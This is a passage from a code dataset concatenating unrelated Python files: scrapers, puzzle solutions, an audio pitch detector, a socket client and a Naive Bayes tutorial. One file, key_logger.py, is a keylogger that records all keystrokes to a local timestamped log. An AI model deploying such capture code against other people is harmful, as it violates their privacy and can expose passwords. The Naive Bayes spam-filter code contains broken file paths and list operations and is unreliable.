itemSinContainer(self, s, startIndices, noOfstartIndices, endIndices, noOfendIndices):\n res = 0\n\n def count(str):\n parts = str.split('|')\n total = 0\n for i in range(1, len(parts) - 1):\n total += len(parts[i])\n return total\n\n for i, j in zip(startIndices, endIndices):\n res += count(s[i - 1:j])\n return res\n\n\nprint(Solution().itemSinContainer('*|*|', [1], 1, [1], 1))\nprint(Solution().itemSinContainer(\"*|*|*|\", [1], 1, [6], 1))\nprint(Solution().itemSinContainer('|**|*|*', [1, 1], 2, [5, 6], 2))\n","sub_path":"src/amazon/Items in Containers.py","file_name":"Items in Containers.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"68382678","text":"import urllib.request\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport datetime\nimport csv\n\nfrom itertools import count\n\ndef get_request_url(url,enc = 'utf-8'):\n req = urllib.request.Request(url)\n\n try:\n response = urllib.request.urlopen(req)\n if response.getcode() == 200:\n try:\n rcv = response.read()\n ret = rcv.decode(enc)\n except UnicodeDecodeError:\n ret = rcv.decode(enc, 'replace')\n return ret\n except Exception as e:\n print(e)\n print(\"[%s] Error for URL : %s\" % (datetime.datetime.now(), url))\n return None\n\n\n\ndef main():\n\n\n url = 'https://search.shopping.naver.com/search/category.nhn?cat_id=50000167'\n rcv_data = get_request_url(url)\n soupData = BeautifulSoup(rcv_data, 'html.parser')\n\n ctg1 = []\n\n ctg1_tag = soupData.select('a._category1 em')\n for i in range(len(ctg1_tag)):\n ctg1.append(ctg1_tag[i].text)\n ctg1_url = [50000000+i for i in range(11)]\n #ctg1_dict = {i: 50000000 + ind for ind, i in enumerate(ctg1)}\n\n ctg2 = []\n ctg2_url = []\n\n ctg3 = []\n ctg3_url = []\n\n for i in range(11):\n url = 'https://search.shopping.naver.com/category/category.nhn?cat_id='\n\n url = url + str(50000000+i)\n print(url)\n rcv_data = get_request_url(url)\n soupData = BeautifulSoup(rcv_data, 'html.parser')\n\n\n ctg2_tag = soupData.select('div.category_cell h3 strong')\n for j in ctg2_tag:\n ctg2.append(j.text)\n ctg2_tag2 = soupData.select('div.category_cell h3 a')\n for i in ctg2_tag2:\n ctg2_url.append(i.get('href')[-8:])\n\n\n ctg3_tag = soupData.select('div.category_cell ul.category_list li a')\n\n for i in ctg3_tag:\n if i.text=='더보기':\n continue\n else:\n ctg3.append(i.text)\n ctg3_url.append(i.get('href')[-8:])\n\n\n #ctg2_dict = {a: b for a, b in zip(ctg2, ctg2_url)}\n #print(ctg2_dict)\n\n #ctg3_dict = {a: b for a, b in zip(ctg3, ctg3_url)}\n #print(ctg3_dict)\n\n\n dfctg1 = pd.DataFrame([(a,b) for a,b in zip(ctg1,ctg1_url)],columns=['ctg1','id'])\n dfctg2 = pd.DataFrame([(a,b) for a,b in zip(ctg2,ctg2_url)],columns=['ctg2','id'])\n dfctg3 = pd.DataFrame([(a, b) for a, b in zip(ctg3, ctg3_url)], columns=['ctg3', 'id'])\n\n dfctg1.to_csv('ctg1.csv',index=False,index_label=False)\n dfctg2.to_csv('ctg2.csv', index=False, index_label=False)\n dfctg3.to_csv('ctg3.csv', index=False, index_label=False)\n\n\n # ctg3_dict = {a: b for a, b in zip(ctg3, ctg3_url)}\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"1_lpoint/3_1_외부변수_날씨,미세먼지/날씨, 미세먼지 크롤링/url읽기.py","file_name":"url읽기.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"321883413","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import (absolute_import, division, print_function, unicode_literals)\n\n__author__ = 'alexandre'\n\nclass Singleton:\n def __init__(self, klass):\n self.klass = klass\n self.instance = None\n\n def __call__(self, *args, **kwds):\n if self.instance is None:\n self.instance = self.klass(*args, **kwds)\n return self.instance\n\n","sub_path":"pt/acarlos/Singleton.py","file_name":"Singleton.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"352052304","text":"# coding: utf-8\n\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^process/$', views.payment_process, name='process'),\n url(r'^done/$', views.payment_done, name='done'),\n url(r'^cancel/$', views.payment_canceled, name='canceled'),\n]","sub_path":"payment/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"643989511","text":"\"\"\"\r\nTask\r\n\r\nYou are given a NXM integer array matrix with space separated elements (N = rows and M = columns).\r\nYour task is to print the transpose and flatten results.\r\n\r\nInput Format\r\n\r\nThe first line contains the space separated values of N and M.\r\nThe next lines contains N the space separated elements of M columns.\r\n\r\nOutput Format\r\n\r\nFirst, print the transpose array and then print the flatten\r\n\"\"\"\r\n\r\nimport numpy as np\r\nN, M = map(int, input().split())\r\nl = []\r\nfor i in range(N):\r\n n = list(map(int, input().split()))[:M]\r\n l.append(n)\r\nx = np.array(l)\r\nprint(np.transpose(x))\r\nprint(x.flatten())\r\n","sub_path":"Transpose and Flatten.py","file_name":"Transpose and Flatten.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"133484750","text":"from pynput import keyboard\nimport time\n\nalpha = \"abcdefghijklmnopqrstuvwxyz\"\nnum = \"1234567890\"\nsym1 = \"-=[];'#,./\\\\`\"\nsym2 = {\"1\":\"!\",\"2\":\"\\\"\",\"3\":\"£\",\"4\":\"$\",\"5\":\"%\",\"6\":\"^\",\"7\":\"&\",\"8\":\"*\",\"9\":\"(\",\"0\":\")\",\"`\":\"¬\",\"-\":\"_\",\"=\":\"+\",\"[\":\"{\",\"]\":\"}\",\";\":\":\",\"'\":\"@\",\"#\":\"~\",\",\":\"<\",\".\":\">\",\"/\":\"?\",\"\\\\\":\"|\"}\n\ndef main():\n\twith keyboard.Listener(on_press=on_press, on_release=on_release) as listener:\n\t\tprint(\"Press esc to quit\")\n\t\tlistener.join()\n\ndef on_press(key):\n\tglobal shift\n\tkey = str(key).strip(\"'\")\n\t\n\tif key == \"Key.space\":\n\t\tword.append(\" \")\n\n\telif key == \"Key.enter\":\n\t\tword.append(\"\\n\")\n\t\n\telif key == \"Key.esc\": \n\t\twith open(\"log.txt\", \"a\") as log:\n\t\t\tlog.write(\"\\n[@]\"+time.asctime()+\"\\n\")\n\t\t\tfor char in word:\n\t\t\t\tlog.write(char)\n\t\treturn False\n\t\n\telif key in alpha:\n\t\tword.append(key)\n\n\telif key in num:\n\t\tif shift == True:\n\t\t\tword.append(sym2[key])\n\t\t\tshift = False\n\t\telse:\n\t\t\tword.append(key)\n\t\n\telif key in sym1:\n\t\tif shift == True:\n\t\t\tword.append(sym2[key])\n\t\t\tshift = False\n\t\telse:\n\t\t\tword.append(key)\n\n\telif key == \"Key.shift\" or key == \"Key.shift_r\":\n\t\tshift = True\n\t\n\telse:\n\t\tword.append(\" [\"+key+\"] \")\n\ndef on_release(key):\n\treturn True\n\nif __name__ == \"__main__\":\n\tword = []\n\tshift = False\n\tmain()","sub_path":"key_logger.py","file_name":"key_logger.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"211111705","text":"\n# Image sensor exposure time 1-5000\nexposure_time = 12\n# Contrast\ncontrast = 64\n# Brightness -64-64\nbrightness = 64\n# Saturation 0-128\nsaturation = 128\n# gain 0-100\ngain = 0\n\ncam_params = {'exposure_auto':1, 'exposure_absolute':exposure_time,\n 'gain':gain,'saturation':saturation,\n 'brightness':brightness,'contrast':contrast}\n","sub_path":"cam_params.py","file_name":"cam_params.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"32324020","text":"from scipy import signal\nimport threading\n\nimport pyaudio # package portaudio-devel\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom drawnow import drawnow\n\n\nclass Dsp:\n\n\n def __init__(self):\n self.notes_name = [\"do0\", \"do0# / ré0b\", \"ré0\", \"ré0# / mi0b\", \"mi0\", \"fa0\", \"fa0# / sol0b\", \"sol0\", \"sol0# / la0b\",\n \"la0\", \"la0# / si0b\", \"si0\", \"do1\", \"do1# / ré1b\", \"ré1\", \"ré1# / mi1b\", \"mi1\", \"fa1\",\n \"fa1# / sol1b\", \"sol1\", \"sol1# / la1b\", \"la1\", \"la1# / si1b\", \"si1\", \"do2\", \"do2# / ré2b\", \"ré2\",\n \"ré2# / mi2b\", \"mi2\", \"fa2\", \"fa2# / sol2b\", \"sol2\", \"sol2# / la2b\", \"la2\", \"la2# / si2b\", \"si2\",\n \"do3\", \"do3# / ré3b\", \"ré3\", \"ré3# / mi3b\", \"mi3\", \"fa3\", \"fa3# / sol3b\", \"sol3\", \"sol3# / la3b\",\n \"la3\", \"la3# / si3b\", \"si3\", \"do4\", \"do4# / ré4b\", \"ré4\", \"ré4# / mi4b\", \"mi4\", \"fa4\",\n \"fa4# / sol4b\", \"sol4\", \"sol4# / la4b\", \"la4\", \"la4# / si4b\", \"si4\", \"do5\", \"do5# / ré5b\", \"ré5\",\n \"ré5# / mi5b\", \"mi5\", \"fa5\", \"fa5# / sol5b\", \"sol5\", \"sol5# / la5b\", \"la5\", \"la5# / si5b\", \"si5\",\n \"do6\", \"do6# / ré6b\", \"ré6\", \"ré6# / mi6b\", \"mi6\", \"fa6\", \"fa6# / sol6b\", \"sol6\", \"sol6# / la6b\",\n \"la6\", \"la6# / si6b\", \"si6\", \"do7\", \"do7# / ré7b\", \"ré7\", \"ré7# / mi7b\", \"mi7\", \"fa7\",\n \"fa7# / sol7b\", \"sol7\", \"sol7# / la7b\", \"la7\", \"la7# / si7b\", \"si7\", \"do8\", \"do8# / ré8b\", \"ré8\",\n \"ré8# / mi8b\", \"mi8\", \"fa8\", \"fa8# / sol8b\", \"sol8\", \"sol8# / la8b\", \"la8\", \"la8# / si8b\", \"si8\",\n \"do9\", \"do9# / ré9b\", \"ré9\", \"ré9# / mi9b\", \"mi9\", \"fa9\", \"fa9# / sol9b\", \"sol9\", \"sol9# / la9b\",\n \"la9\", \"la9# / si9b\", \"si9\"]\n\n self.notes_frequency = [32.7, 34.65, 36.71, 38.89, 41.2, 43.65, 46.25, 49, 51.91, 55, 58.27, 61.74, 65.41, 69.3,\n 73.42, 77.78, 82.41, 87.31, 92.5, 98, 103.8, 110, 116.5, 123.5, 130.8, 138.6, 146.8, 155.6,\n 164.8, 174.6, 185, 196, 207.7, 220, 233.1, 246.9, 261.6, 277.2, 293.7, 311.1, 329.6, 349.2,\n 370, 392, 415.3, 440, 466.2, 493.9, 523.3, 554.4, 587.3, 622.3, 659.3, 698.5, 740, 784,\n 830.6, 880, 932.3, 987.8, 1046.5, 1108.7, 1174.7, 1244.5, 1318.5, 1396.9, 1480, 1568, 1661.2,\n 1760, 1864.7, 1975.5, 2093, 2217.5, 2349.3, 2489, 2637, 2793.8, 2960, 3136, 3322.4, 3520,\n 3729.3, 3951.1, 4186, 4434.9, 4698.6, 4978, 5274, 5587.7, 5919.9, 6271.9, 6644.9, 7040,\n 7458.6, 7902.1, 8372, 8869.8, 9397.3, 9956.1, 10548, 11175, 11840, 12544, 13290, 14080,\n 14917, 15804, 16744, 17740, 18795, 19912, 21096, 22351, 23680, 25088, 26580, 28160, 29834,\n 31609]\n\n self.num_samples = 16384 # number of data points to read at a time\n self.RATE = 44100 # time resolution of the recording device (Hz)\n\n self.p = pyaudio.PyAudio() # start the PyAudio class\n self.stream = self.p.open(format=pyaudio.paInt16, channels=1, rate=self.RATE, input=True,\n frames_per_buffer=self.num_samples) # uses default input device\n\n self.frequency = []\n f = 0\n self.f_step = self.RATE / self.num_samples\n\n for i in range(0, int(self.num_samples / 2)):\n self.frequency.append(f)\n f += self.f_step\n\n self.on = True\n self.process = True\n\n self.note = \"\"\n self.note_index = 0\n self.note_right = \"\"\n self.note_left = \"\"\n\n self.closeness = 0\n self.strongestFrequency = 0\n self.intensity = 0\n self.targetFrequency = 0\n self.targetFrequency_right = 0\n self.targetFrequency_left = 0\n self.frequencies_intensities = []\n\n\n self.thread1 = threading.Thread(target=self.processAudio, args=())\n self.thread1.setDaemon(False)\n self.thread1.start()\n\n\n\n def find_nearest_index(self, array, value):\n array = np.asarray(array)\n return (np.abs(array - value)).argmin()\n\n def get_closeness(self, index, value):\n if value > self.notes_frequency[index] :\n output = abs(self.notes_frequency[index + 1] - value)\n output = (output * 100) / (self.notes_frequency[index + 1] - self.notes_frequency[index])\n output = abs(100-output)\n\n else:\n output = abs(self.notes_frequency[index - 1] - value)\n output = (output * 100) / (self.notes_frequency[index] - self.notes_frequency[index - 1])\n output = abs(100-output)*-1\n\n return output\n\n\n def make_fig(self):\n # plt.scatter(x, y) # I think you meant this\n plt.xlim((150, 600))\n plt.plot(self.frequency, self.frequencies_intensities)\n\n #\n def get_first_strongestFrequency_intensity_index(self, min_intensity):\n for i in range(1,len(self.frequencies_intensities)-1):\n if self.frequencies_intensities[i] > min_intensity:\n for j in range(i, len(self.frequencies_intensities) - 1):\n if self.frequencies_intensities[j] < min_intensity:\n return round((i+j)/2)\n\n\n\n def processAudio(self):\n # create a numpy array holding a single read of audio data\n note_number = len(self.notes_name)\n\n while self.on:\n if self.process:\n data = np.fromstring(self.stream.read(self.num_samples), dtype=np.int16)\n data_fft = np.fft.fft(data)\n # data_fft = data\n data_fft = data_fft[0:int(self.num_samples / 2)]\n self.frequencies_intensities = np.abs(data_fft)\n self.frequencies_intensities /= 32767\n # drawnow(self.make_fig)\n\n strongestFrequency_intensity_index = self.get_first_strongestFrequency_intensity_index(0.1)\n\n if strongestFrequency_intensity_index is not None:\n\n self.strongestFrequency = self.frequency[strongestFrequency_intensity_index]\n self.intensity = self.frequencies_intensities[strongestFrequency_intensity_index]\n self.note_index = self.find_nearest_index(self.notes_frequency, self.strongestFrequency)\n self.note = self.notes_name[self.note_index]\n self.closeness = self.get_closeness(self.note_index, self.strongestFrequency)\n if self.note_index > 0:\n self.note_left = self.notes_name[self.note_index-1]\n self.targetFrequency_left = self.notes_frequency[self.note_index-1]\n else:\n self.note_left = \"--\"\n self.targetFrequency_left = 0\n\n if self.note_index < note_number-1:\n self.note_right = self.notes_name[self.note_index+1]\n self.targetFrequency_right = self.notes_frequency[self.note_index+1]\n\n else:\n self.note_right = \"--\"\n self.targetFrequency_right = 0\n\n self.targetFrequency = self.notes_frequency[self.note_index]\n # if strongestFrequency_intensity > 400:\n # print(current_milli_time()-start)\n # plt.plot(frequencies)\n # plt.show()\n # print(data)\n\n def __del__(self):\n # close the stream gracefully\n self.on = False\n self.stream.stop_stream()\n self.stream.close()\n self.p.terminate()\n\n","sub_path":"Dsp.py","file_name":"Dsp.py","file_ext":"py","file_size_in_byte":7719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"632561047","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n # use dictionary for O(n) complexity\n dict = {}\n for i in range(len(nums)):\n one = nums[i]\n two = target - one\n if((two) in dict):\n return (i, dict[two])\n else:\n dict[one] = i\n","sub_path":"LC_1_two_sum.py","file_name":"LC_1_two_sum.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"193506828","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n#\n# Copyright © 2018 zack \n#\n# Distributed under terms of the MIT license.\n\n\"\"\"\n\"\"\"\nimport requests\nimport time\nimport json\nimport os, sys\nimport socket\nfrom flask import Flask\nfrom flask_restful import Resource, Api\n\nhostname = '192.168.8.11' #chang to your service IP\nport = '8080' #chang to your service Port\n\ndef get():\n response = os.system('ping -c 1 ' + hostname)\n #print(response)\n if (response == 0):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex((hostname, int(port)))\n if result == 0:\n sock.close()\n distance = 'http://' + hostname + ':' + port\n #print(distance)\n r = requests.get(distance)\n #print(r)\n #print(r.content)\n value = r.content.decode('utf-8')\n resp = '{\"message\":' + '\"connect\"}'\n return json.loads(value)\n else:\n resp = '{\"message\":' + '\"connect-error\" }'\n return json.loads(resp)\n else:\n resp = '{\"message\":' + '\"network-error\"}'\n #print(resp)\n json.loads(resp)\n\n\n\n#-----------------------------------------------------------------------------------------------------\n\nbind_ip = \"10.21.20.210\"\ndef main(send_port):\n send_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n send_socket.connect((bind_ip,send_port))\n str_test = json.dumps(test)\n while(1):\n d = input(\"select 1(continue) or -1(go out):\")\n if d==\"-1\":\n send_socket.close()\n break\n else:\n test = get();\n d ='{\"active\":\"create\",\"cmd\":\"./subscriber -DCPSConfigFIle rtps.ini\",\"topic\":\"UPS\"}'\n print (d)\n send_socket.send(d.encode())\n str_test = str(test).split(\",\")\n for str_test in str_test:\n d='{\"send\":\"{\\\\\"from\\\\\":\\\\\"7610307082307919\\\\\",\\\\\"message\\\\\":\\\\\"'+ str_test + ' \\\\\"}\"}'\n #d = '{\"send\":\"{\\\\\"from\\\\\":\\\\\"7610307082307919\\\\\",\\\\\"message\\\\\":\\\\\"一\\\\\"}\"}'\n print (d +\"\\n\")\n send_socket.send(d.encode())\n time.sleep(1)\n print (send_socket.recv(1024))\n\nif __name__ ==\"__main__\":\n send_port = int(input(\"port \"))\n main(send_port)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"152633159","text":"\"\"\"贝叶斯分类器\"\"\"\n# # 1、sklearn的贝叶斯模型\n# import numpy as np\n# from sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB\n#\n# X_Gau = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])\n# Y_Gau = np.array([1, 1, 1, 2, 2, 2])\n# X_Mul = np.random.randint(5, size=(6, 100))\n# Y_Mul = np.array([1, 2, 3, 4, 5, 6])\n# X_Ber = np.random.randint(2, size=(6, 100))\n# Y_Ber = np.array([1, 2, 3, 4, 4, 5])\n#\n# clf_Gau = GaussianNB()\n# clf_Mul = MultinomialNB()\n# clf_Ber = BernoulliNB()\n#\n# clf_Gau.fit(X_Gau, Y_Gau)\n# clf_Mul.fit(X_Mul, Y_Mul)\n# clf_Ber.fit(X_Ber, Y_Ber)\n#\n# print(clf_Gau.predict([[-0.8, -1]]))\n# clf_pf = GaussianNB()\n# clf_pf.partial_fit(X_Gau, Y_Gau, np.unique(Y_Gau))\n# print(clf_pf.predict([[-0.8, -1]]))\n# print(clf_Mul.predict(X_Mul[2:3]))\n# print(clf_Ber.predict(X_Ber[2:3]))\nimport numpy as np\n# *************===========Sample:屏蔽社区留言板的侮辱性言论===============****************\ndef load_dataSet():\n\t# postingList:单词列表\n\tpostingList = [['my', 'dog', 'has', 'flea', 'problems', 'help', 'please'],\n\t ['maybe', 'not', 'take', 'him', 'to', 'dog', 'park', 'stupid'],\n\t ['my', 'dalmation', 'is', 'so', 'cute', 'I', 'love', 'him'],\n\t ['stop', 'posting', 'stupid', 'worthless', 'garbage'],\n\t ['mr', 'licks', 'ate', 'my', 'steak', 'how', 'to', 'stop', 'him'],\n\t ['quit', 'buying', 'worthless', 'dog', 'food', 'stupid']]\n\t# classVec:标签列表,1表示侮辱性质,0表示非侮辱性质\n\tclassVec = [0, 1, 0, 1, 0, 1]\n\treturn postingList, classVec\n\ndef createVocabList(dataSet): # 创建全部文档的词汇集\n\t# 获取所有单词的集合\n\tvocabSet = set([])\n\tfor document in dataSet: # 对数据集中的文档分解为集合\n\t\tvocabSet = vocabSet | set(document) # 取两个集合的并集\n\treturn list(vocabSet)\n\ndef setOfWord2Vec(vocabList, inputSet): # 分析输入文档的词向量\n\treturnVec = [0] * len(vocabList) # 创建一个和词汇集等长的向量,元素全部设为零\n\tfor word in inputSet: # 对输入文档的每个词汇进行判断\n\t\tif word in vocabList: # 如果输入文档的词在词汇表中,则对应位置的值设为1\n\t\t\treturnVec[vocabList.index(word)] = 1\n\t\telse:\n\t\t\tprint(\"the word: %s is not in my Vocabulary!\" % word)\n\treturn returnVec\n\ndef _trainNB0(trainMatrix, trainCategory): # 训练模型1\n\tnumTrainDocs = len(trainMatrix) # 文件数\n\tnumWords = len(trainMatrix[0]) # 单词数\n\tpAbusive = sum(trainCategory) / float(numTrainDocs) # 代表的就是多少个侮辱性文件,与文件的总数相除就得到了侮辱性文件的出现概率\n\t# 构建单词出现的列表\n\tp0Num = np.zeros(numWords) # [0,0,0,.....]\n\tp1Num = np.zeros(numWords) # [0,0,0,.....]\n\t# 整个数据集单词出现的次数\n\tp0Denom = 0.0\n\tp1Denom = 0.0\n\tfor i in range(numTrainDocs): # 遍历所有的文件,如果是侮辱性文件,就计算此侮辱性文件中出现的侮辱性单词的个数\n\t\tif trainCategory[i] == 1:\n\t\t\tp1Num += trainMatrix[i]\n\t\t\tp1Denom += sum(trainMatrix[i])\n\t\telse:\n\t\t\tp0Num += trainMatrix[i]\n\t\t\tp0Denom += sum(trainMatrix[i])\n\tp1Vect = p1Num / p1Denom\n\tp0Vect = p0Num / p0Denom\n\treturn p0Vect, p1Vect, pAbusive\n\ndef trainNB0(trainMatrix, trainCategory): # 训练模型的优化版:优化出现概率为0、计算结果出现下溢问题\n\tnumTrainDocs = len(trainMatrix)\n\tnumWords = len(trainMatrix[0])\n\t# 因为侮辱性的被标记为了1, 所以只要把他们相加就可以得到侮辱性的有多少\n\t# 侮辱性文件的出现概率,即train_category中所有的1的个数,\n\t# 代表的就是多少个侮辱性文件,与文件的总数相除就得到了侮辱性文件的出现概率\n\tpAbusive = sum(trainCategory) / float(numTrainDocs)\n\t# 单词出现的次数\n\tp0Num = np.ones(numWords) # 改为np.ones()是为了防止数字过小溢出\n\tp1Num = np.ones(numWords)\n\tp0Denom = 2.0\n\tp1Denom = 2.0\n\tfor i in range(numTrainDocs):\n\t\tif trainCategory[i] == 1:\n\t\t\tp1Num += trainMatrix[i]\n\t\t\tp1Denom += sum(trainMatrix[i])\n\t\telse:\n\t\t\tp0Num += trainMatrix[i]\n\t\t\tp1Denom += sum(trainMatrix[i])\n\tp1Vect = np.log(p1Num / p1Denom) # 去Log函数\n\tp0Vect = np.log(p0Num / p0Denom)\n\treturn p0Vect, p1Vect, pAbusive\n\ndef classifyNB(vec2Classify, p0Vec, p1Vec, pClass1):\n\t# 计算公式 log(P(F1|C))+log(P(F2|C))+....+log(P(Fn|C))+log(P(C))\n\t# 使用 NumPy 数组来计算两个向量相乘的结果,这里的相乘是指对应元素相乘,即先将两个向量中的第一个元素相乘,然后将第2个元素相乘,以此类推。\n\t# 我的理解是:这里的 vec2Classify * p1Vec 的意思就是将每个词与其对应的概率相关联起来\n\t# 可以理解为 1.单词在词汇表中的条件下,文件是good 类别的概率 也可以理解为 2.在整个空间下,文件既在词汇表中又是good类别的概率\n\tp1 = sum(vec2Classify * p1Vec) + np.log(pClass1)\n\tp0 = sum(vec2Classify * p0Vec) + np.log(1.0 - pClass1)\n\tif p1 > p0:\n\t\treturn 1\n\telse:\n\t\treturn 0\n\ndef bagOfWords2VecMN(vocabList, inputSet):\n\treturnVect = [0] * len(vocabList)\n\tfor word in inputSet:\n\t\tif word in vocabList:\n\t\t\treturnVect[vocabList.index(word)] += 1 # 返回的是词向量出现的累计值\n\t\telse:\n\t\t\tprint('the word: {} is not in my vocabulary'.format(word))\n\treturn returnVect\n\ndef testingNB():\n\tlistOPosts, listClasses = load_dataSet() # 加载数据集\n\tmyVocabList = createVocabList(listOPosts) # 创建单词集合\n\ttrainMat = [] # 计算单词是否出现,并创建数据矩阵\n\tfor postinDoc in listOPosts:\n\t\t# 返回m*len(vocab_list)的矩阵, 记录的都是0,1信息\n\t\t# 其实就是那个东西的句子向量(就是data_set里面每一行,也不算句子吧)\n\t\ttrainMat.append(setOfWord2Vec(myVocabList, postinDoc))\n\tp0V, p1V, pAb = trainNB0(np.array(trainMat), np.array(listClasses)) # 训练数据模型\n\t# 测试数据集\n\ttestEntry1 = ['love', 'my', 'dalmation']\n\tthisDoc1 = np.array(setOfWord2Vec(myVocabList, testEntry1))\n\tprint(testEntry1, 'classified as: ', classifyNB(thisDoc1, p0V, p1V, pAb))\n\ttestEntry2 = ['stupid', 'garbage']\n\tthisDoc2 = np.array(setOfWord2Vec(myVocabList, testEntry2))\n\tprint(testEntry2, 'classified as: ', classifyNB(thisDoc2, p0V, p1V, pAb))\n\n# *************===========Sample:垃圾邮件过滤===============****************\ndef textParse(bigString): # 切分文本\n\timport re\n\tlistOfTokens = re.split(r'\\W+', bigString) # # 使用正则表达式来切分句子,其中分隔符是除单词、数字外的任意字符串\n\tif len(listOfTokens) == 0:\n\t\tprint(listOfTokens)\n\treturn [tok.lower() for tok in listOfTokens if len(tok) > 2]\n\ndef spamTest(): # 对贝叶斯垃圾邮件分类器进行自动化处理\n\tdocList = []\n\tclassList = []\n\tfullText = []\n\tfor i in range(1, 26):\n\t\t# 切分解析数据,并归类为1\n\t\t# 添加垃圾��件信息\n\t\t# 这里需要做一个说明,为什么我会使用try except 来做\n\t\t# 因为我们其中有几个文件的编码格式是 windows 1252 (spam: 17.txt, ham: 6.txt...)\n\t\t# 这里其实还可以 :\n\t\t# import os\n\t\t# 然后检查 os.system(' file {}.txt'.format(i)),看一下返回的是什么\n\t\t# 如果正常能读返回的都是: ASCII text\n\t\t# 对于except需要处理的都是返回: Non-ISO extended-ASCII text, with very long lines\n\t\ttry:\n\t\t\twords = textParse(open('data/4.NaiveBayes/email/spam/{}.txt'.format(i)).read())\n\t\texcept:\n\t\t\twords = textParse(open('data/4.NaiveBayes/email/spam/{}.txt'.format(i), encoding='Windows 1252').read())\n\t\tdocList.append(words)\n\t\tfullText.extend(words)\n\t\tclassList.append(1)\n\t\ttry:\n\t\t\t# 添加非垃圾邮件\n\t\t\twords = textParse(open('data/4.NaiveBayes/email/ham/{}.txt'.format(i)).read())\n\t\texcept:\n\t\t\twords = textParse(open('data/4.NaiveBayes/email/ham/{}.txt'.format(i), encoding='Windows 1252').read())\n\t\twordList = textParse(open(r'').read())\n\t\tdocList.append(wordList)\n\t\tclassList.append(1)\n\t\t# 切分解析数据,并归类为0\n\t\twordList = textParse(open(r'').read())\n\t\tdocList.append(wordList)\n\t\tfullText.extend(wordList)\n\t\tclassList.append(0)\n\tvocabList = createVocabList(docList) # 创建词汇表\n\ttrainingSet = range(50)\n\ttestSet = []\n\tfor i in range(10):\n\t\trandIndex = int(np.random.uniform(0, len(trainingSet)))\n\t\ttestSet.append(trainingSet[randIndex])\n\t\tdel (trainingSet[randIndex])\n\ttrainMat = []\n\ttrainClasses = []\n\tfor docIndex in trainingSet:\n\t\ttrainMat.append(setOfWord2Vec(vocabList, docList[docIndex]))\n\t\ttrainClasses.append(classList[docIndex])\n\tp0V, p1V, pSpam = trainNB0(np.array(trainMat), np.array(trainClasses))\n\terrorCount = 0\n\tfor docIndex in testSet:\n\t\twordVector = setOfWord2Vec(vocabList, docList[docIndex])\n\t\tif classifyNB(np.array(wordVector), p0V, p1V, pSpam) != classList[docIndex]:\n\t\t\terrorCount += 1\n\tprint('the errorCount is: ', errorCount)\n\tprint('the testSet length is :', len(testSet))\n\tprint('the error rate is :', float(errorCount) / len(testSet))\n\ndef testParseTest():\n\tprint(textParse(open(r' ').read()))\n\n# *************===========Sample:从个人广告中获取区域倾向===============****************\n# 解析文本为词条向量\ndef setOfWords2Vec(vocabList, inputSet):\n\treturnVec = [0] * len(vocabList)\n\tfor word in inputSet:\n\t\tif word in vocabList:\n\t\t\treturnVec[vocabList.index(word)] += 1\n\treturn returnVec\n\ndef textParse1(bigString): # 文本解析\n\timport re\n\tlistOfTokens = re.split(r'\\W*', bigString)\n\treturn [tok.lower() for tok in listOfTokens if len(tok) > 2]\n\ndef calcMostFreq(vocabList,fullText):\n\timport operator\n\tfreqDict={}\n\tfor token in vocabList: #遍历词汇表中的每个词\n\t\tfreqDict[token]=fullText.count(token) #统计每个词在文本中出现的次数\n\tsortedFreq=sorted(freqDict.items(),key=operator.itemgetter(1),reverse=True) #根据每个词出现的次数从高到底对字典进行排序\n\treturn sortedFreq[:30] #返回出现次数最高的30个单词\n\ndef localWords(feed1,feed0):\n\timport feedparser\n\tdocList = []\n\tclassList = []\n\tfullText = []\n\tminLen = min(len(feed1['entries']), len(feed0['entries']))\n\tfor i in range(minLen):\n\t\twordList = textParse(feed1['entries'][i]['summary']) # 每次访问一条RSS源\n\t\tdocList.append(wordList)\n\t\tfullText.extend(wordList)\n\t\tclassList.append(1)\n\t\twordList = textParse(feed0['entries'][i]['summary'])\n\t\tdocList.append(wordList)\n\t\tfullText.extend(wordList)\n\t\tclassList.append(0)\n\tvocabList = createVocabList(docList)\n\ttop30Words = calcMostFreq(vocabList, fullText)\n\tfor pairW in top30Words:\n\t\tif pairW[0] in vocabList: vocabList.remove(pairW[0]) # 去掉出现次数最高的那些词\n\ttrainingSet = range(2 * minLen)\n\ttestSet = []\n\tfor i in range(20):\n\t\trandIndex = int(np.random.uniform(0, len(trainingSet)))\n\t\ttestSet.append(trainingSet[randIndex])\n\t\tdel (trainingSet[randIndex])\n\ttrainMat = []\n\ttrainClasses = []\n\tfor 